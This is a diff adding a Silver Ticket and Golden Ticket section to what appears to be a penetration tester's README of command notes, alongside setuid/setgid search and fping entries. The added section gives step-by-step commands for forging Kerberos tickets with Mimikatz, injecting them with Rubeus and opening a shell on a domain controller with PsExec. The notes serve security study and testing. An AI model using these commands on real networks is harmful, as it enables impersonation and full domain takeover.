encryptedninja/command-center/README.md

 If a lowercase letter “l” appears in the group’s execute field, means that the setgid bit is on, and the execute bit for the group is off or denied.

 * `find / -perm +6000 2>/dev/null | grep '/bin/'` only use grep if you need it or looking for a very specific location

+## Silver Ticket and Golden Ticket

+* **Silver Ticket attack**
+* needed:
+* Domain security identifier (SID)
+* Domain fully qualified domain name (FQDN)
+* Service account's password hash
+* Username to impersonate
+* Service name
+* Target
+* `whoami /user`
+* get SID
+* `systeminfo | findstr /B /C:"Domain"`
+* get FQDN
+* `setspn -L <service account name>`
+* get service, ex.: HTTP/worktation-02.krbtown.local
+* service is HTTP
+* creating the ticket with Mimikatz:
+* `kerberos::golden /sid:<SID (remove last 4 digits after dash)> /domain:<Domain FQDN> /user:<user to impersonate (need user's hash too at the end)> /service:<service we are trying to connect to, in our example is HTTP> /target:<The target server (workstation-02.krbtown.local)> /rc4:<the password hash of the service account in our case Administrator>`
+* Mimikatz will save the output as ticket.kirbi
+* using Rubeus to lead the ticket into our current session:
+* `Rubeus.exe ptt /ticket:ticket.kirbi`
+* now we can connect to the iis_service from this session
+* **Golden Ticket attack**
+* needed:
+* Domain SID
+* Domain FQDN
+* KRBTGT's password hash
+* Username to impersonate
+* `whoami /user`
+* `systeminfo | findstr /B /C:"Domain"`
+* The KRBTGT's password hash can only be dumped after becoming domain administrator and either performing a password dump on the DC, a DYNSync attack or a shadow copy on the DC.
+The user to impersonate can be any user of the domain even a non existing one with administrator RID.
+* `kerberos::golden /sid:<Domain SID> /domain:<Domain FQDN> /user:<The user to impersonate> /krbtgt:<The password hash of the KRBTGT account>`
+* load the kreated ticket into memory and then use psexec to get a shell on the target machine
+* `Rubeus.exe ptt /ticket:ticket.kirbi`
+* `PsExec.exe \\dc01.krbtown.local cmd`

 ## fping
 Helps you to ping a range of IP addresses.